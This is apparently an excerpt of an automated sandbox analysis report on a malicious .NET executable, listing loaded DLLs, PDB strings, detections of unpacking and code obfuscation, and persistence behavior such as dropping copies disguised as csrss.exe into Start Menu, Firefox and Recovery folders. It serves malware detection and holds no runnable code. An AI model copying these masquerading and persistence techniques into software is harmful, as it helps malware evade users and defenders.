Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: ntmarta.dll
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{289AF617-1CC3-42A6-926C-E6A863F0E3BA}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\ebcca32ff60686 Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Jump to behavior
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Directory created: C:\Program Files\Windows Portable Devices\ebcca32ff60686 Jump to behavior
Source: fDTPlvsGfH.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: fDTPlvsGfH.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: fDTPlvsGfH.exe Static file information: File size 2669568 > 1048576
Source: fDTPlvsGfH.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x28b400
Source: fDTPlvsGfH.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: eC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: xC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: |C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: gC:/Users/user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ~C:/Users/user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: yC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: mC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002D96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: }C:/Users/user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wC:/Users/user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: vC:/Users/user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000003796000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: kC:/Users/user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000002B81000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000003796000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:/Users/user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: nRlqAJqnLtuwljTOfeVJPERQcpcS.exe, 00000010.00000002.2890315782.0000000004B96000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation
barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Unpacked PE file: 0.2.fDTPlvsGfH.exe.2580000.4.unpack
.NET source code contains potential unpacker
Source: fDTPlvsGfH.exe, 1a2.cs .Net Code: ghM System.Reflection.Assembly.Load(byte[])
Source: fDTPlvsGfH.exe, 857.cs .Net Code: _736
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9B8B3CB9 push ebx; retf 0_2_00007FFD9B8B3CBA
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9BE561FB push ds; retn 5EFCh 0_2_00007FFD9BE5626F
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9BE575DD push edi; iretd 0_2_00007FFD9BE575DE
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe Code function: 0_2_00007FFD9BE59525 push E8FFFFFFh; retf 0_2_00007FFD9BE59531
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B76D2A5 pushad ; iretd 1_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B88ADF8 push E9582DA2h; ret 1_2_00007FFD9B88AE29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B88BAC8 push E85700D7h; ret 1_2_00007FFD9B88BAF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9B952316 push 8B485F94h; iretd 1_2_00007FFD9B95231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B75D2A5 pushad ; iretd 2_2_00007FFD9B75D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B942316 push 8B485F95h; iretd 2_2_00007FFD9B94231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B76D2A5 pushad ; iretd 4_2_00007FFD9B76D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD9B952316 push 8B485F94h; iretd 4_2_00007FFD9B95231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B77D2A5 pushad ; iretd 6_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFD9B962316 push 8B485F93h; iretd 6_2_00007FFD9B96231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD9B78D2A5 pushad ; iretd 8_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD9B972316 push 8B485F92h; iretd 8_2_00007FFD9B97231B

Persistence and Installation Behavior
barindex
Drops PE files with benign system names
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe Jump to dropped file
Drops executable to a common third party application directory
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File written: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Jump to behavior
Drops PE files
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\eFdBcvYu.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\KySWwqSG.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\iDXAsssK.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\csrss.exe Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\UnQDGoMO.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\wiMZKnmL.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\DSloixRU.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\bXqTeyrX.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\owAZVXxy.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\aOmKVzXA.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\hMaKxNSp.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\nnwRMYdb.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\XgzcXCre.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\HFjxfdnr.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\NyMWIIsf.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\fTLbMRgr.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\JCfvgtvD.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\AZWFwAgV.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\uodzyDCn.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\hPTsHewM.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\CVKgMxCZ.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\jsvAFsni.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\OvoeeIHa.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\DYQGISGu.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\lCRBFKSi.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\RoXDuWmq.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\AhGYbjHb.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\ssViDqmS.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\AHvxDOtC.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\hGwsXsdP.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\dZcBAhwS.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\TlyLQWBk.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\WjYUBCcj.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\OygMnZlw.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Recovery\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\zZCPRjnE.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\TcbLgjio.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\rqDqMXbo.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\ajmLslvZ.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\wlEHTDRh.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\ICLFBdCl.log Jump to dropped file
Source: C:\Users\user\Desktop\fDTPlvsGfH.exe File created: C:\Users\user\Desktop\rhfqclHr.log Jump to dropped file
Source: C:\Program Files\Windows Portable Devices\nRlqAJqnLtuwljTOfeVJPERQcpcS.exe File created: C:\Users\user\Desktop\qZchTloU.log Jump to dropped file
